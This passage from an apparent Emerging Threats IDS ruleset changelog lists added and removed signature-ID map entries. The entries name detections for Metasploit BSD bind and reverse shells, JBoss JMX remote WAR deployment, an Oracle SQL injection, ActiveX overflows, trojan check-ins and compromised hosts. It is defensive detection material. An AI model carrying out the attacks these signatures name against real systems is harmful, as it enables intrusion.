        2010371 || ET SCAN Amap TCP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010371 || url,freeworld.thc.org/thc-amap/
        2010372 || ET SCAN Amap UDP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010372 || url,freeworld.thc.org/thc-amap/
        2010373 || ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010373 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010374 || ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010374 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010375 || ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Oracle || url,doc.emergingthreats.net/2010375 || cve,2009-1991 || url,www.securityfocus.com/bid/36748
        2010376 || ET CURRENT_EVENTS WU Malicious Spam Inbound || url,doc.emergingthreats.net/2010376 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_DHL
        2010377 || ET POLICY JBOSS/JMX 80 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010377 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010378 || ET POLICY JBOSS/JMX 8080 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010378 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010379 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010379 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010380 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (GET) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010380 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010381 || ET TROJAN Bredolab Checkin || url,doc.emergingthreats.net/2010381 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37
        2010382 || ET TROJAN Fake AV GET || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,doc.emergingthreats.net/2010382 || url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35
        2010383 || ET EXPLOIT METASPLOIT BSD Bind shell || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010383
        2010384 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010384
        2010385 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010385
        2010386 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010386
        2010387 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010387
        2010388 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010388
        2010389 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010389
        2010390 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010390
        2010391 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010391
        2010392 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010392
        2010393 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010393
        2010394 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010394
        2010395 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010395
        2010396 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010396
        2010397 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010397
        2010398 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010398
        2010399 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010399
        2010400 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010400
        2010401 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010401
        2010402 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010402
        2010403 || ET EXPLOIT METASPLOIT BSD Bind shell (JmpCallAdditive Encoded) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010403
        2010404 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010404
        2010405 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010405
        2010406 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010406
        2010407 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010407
        2010408 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010408
        2010409 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010409
        2010410 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010410
        2010411 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010411
        2010412 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010412
        2010413 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010413
        2010414 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010414
        2010415 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010415
        2010416 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010416
        2010417 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010417
        2010418 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010418
        2010419 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010419
        2010420 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010420
        2010421 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010421
        2010422 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010422
        2010423 || ET EXPLOIT METASPLOIT BSD Reverse shell (JmpCallAdditive Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010423
        2010424 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010424
        2010425 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010425
        2010426 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010426
        2010427 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010427
        2010428 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010428
        2010429 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010429
        2010430 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010430
        2010431 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010431
        2010432 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010432
        2010433 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010433
        2010434 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010434
        2010435 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010435
        2010436 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010436
        2010437 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010437
        2010438 || ET MALWARE Possible Malicious Applet Access (justexploit kit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Justexploit || url,doc.emergingthreats.net/2010438 || url,www.malwaredomainlist.com/forums/index.php?topic=3570.0
        2010439 || ET TROJAN Generic Trojan Checkin (UA VBTagEdit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Generic.Malware || url,doc.emergingthreats.net/2010439
        2010440 || ET CURRENT_EVENTS MALWARE Potential Malware Download, flash-HQ-plugin.40000.exe || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,doc.emergingthreats.net/2010440 || url,malwareurl.com
        2500506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-virus.rules (1):
        #by Jaime Blasco, updates by evilghost

     -> Added to emerging-web_server.rules (1):
        #by mex

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (5):
        2008357 || ET SCAN Amap Scannner Traffic Inbound || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2008357 || url,freeworld.thc.org/thc-amap/
        2010369 || ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010370 || ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010371 || ET SCAN Amap TCP Service Scan Detected || url,freeworld.thc.org/thc-amap/
        2010372 || ET SCAN Amap UDP Service Scan Detected || url,freeworld.thc.org/thc-amap/

     -> Removed from emerging-sid-msg.map.txt (5):
        2008357 || ET SCAN Amap Scannner Traffic Inbound || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2008357 || url,freeworld.thc.org/thc-amap/
        2010369 || ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
